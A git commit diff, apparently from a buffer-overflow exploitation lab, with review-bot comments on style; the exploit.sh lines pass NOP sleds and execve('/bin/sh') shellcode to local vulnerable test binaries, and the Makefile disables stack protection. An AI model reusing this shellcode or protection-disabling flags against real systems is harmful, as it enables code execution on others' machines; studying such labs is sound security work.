authorToni Uhlig <matzeton@googlemail.com>2018-07-11 10:19:46 +0200
committerToni Uhlig <matzeton@googlemail.com>2018-07-11 10:19:46 +0200
commitd3706047194005ce1cb97c2909f25bd1877115f1 (patch)
tree7dcca9752a891e8feb068d8a600884d0c7948d73
parent71e27ae1766e0090fa989aad7ee930152a1921de (diff)
improvements
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
-rw-r--r--Makefile2
-rw-r--r--dump32.gdb4
-rw-r--r--dump64.gdb4
-rwxr-xr-xexploit.sh4
4 files changed, 7 insertions, 7 deletions
diff --git a/Makefile b/Makefile
index 5ab7706..aff3b9e 100644
--- a/Makefile
+++ b/Makefile
@@ -4,7 +4,7 @@ RM := rm
CC := gcc
STRIP := strip
LBITS := $(shell getconf LONG_BIT)
-CFLAGS += -Wall -O0
+CFLAGS += -Wall -O0 -g
OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static
X86_FLAGS = -m32 -mpreferred-stack-boundary=2
X64_FLAGS = -m64 -mpreferred-stack-boundary=4
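Review bot: The `-g` appended on the `+CFLAGS` line duplicates the `-ggdb` that OCFLAGS already carries on the following line, if both flag sets reach the same compile; if CFLAGS is meant for targets that OCFLAGS does not cover, a short comment such as `# -g: debug info for every target, not only the OCFLAGS builds` would make that intent visible. Because `CFLAGS +=` is discarded wholesale when someone runs `make CFLAGS=...`, the flags this build presumably relies on (`-O0` in particular) would be safer in an internal variable, e.g. `ALL_CFLAGS := -Wall -O0 -g $(CFLAGS)`, or behind `override CFLAGS += -Wall -O0 -g`. Separately, the `RM := rm` shown in the hunk header replaces GNU make's default `rm -f`, so a `clean` recipe using `$(RM)` will fail on an absent product unless the line is `-`-prefixed; that rule lies outside the hunk.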
diff --git a/dump32.gdb b/dump32.gdb
index aa088da..96d5fac 100644
--- a/dump32.gdb
+++ b/dump32.gdb
@@ -1,3 +1,3 @@
-run
-info r
+r
+i r
x/300xw $esp-0x300
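Review bot: Shortening `run` to `r` and `info r` to `i r` makes the script less self-explanatory for no benefit, since GDB accepts the full command names in a script file and `info registers` reads clearest of all; the identical change in dump64.gdb has the same issue. The file also has no header comment, so a one-liner such as `# after the inferior stops: print registers, then dump the stack region around $esp` would help the next reader. In the 64-bit variant the `x/300xw` on the unchanged line prints 4-byte words, so 8-byte stack slots are split across two cells; `x/150xg` over the same range would show them whole.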
diff --git a/dump64.gdb b/dump64.gdb
index 3facd15..4fb75de 100644
--- a/dump64.gdb
+++ b/dump64.gdb
@@ -1,3 +1,3 @@
-run
-info r
+r
+i r
x/300xw $rsp-0x300
diff --git a/exploit.sh b/exploit.sh
index d986fe4..92fad29 100755
--- a/exploit.sh
+++ b/exploit.sh
@@ -67,14 +67,14 @@ if [ "$1" = "local32" ]; then
# NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4)
# uses own shellcode: shellcode/hello.asm (x86-nasm)
echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}"
- ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')
+ gdb -ex r --args ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')
elif [ "$1" = "local64" ]; then
# NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8)
# uses own shellcode: shellcode/execve_x64.o
echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}"
- gdb -batch -ex 'run' --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')
+ gdb -ex r --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')
elif [ "$1" = "bind32" ]; then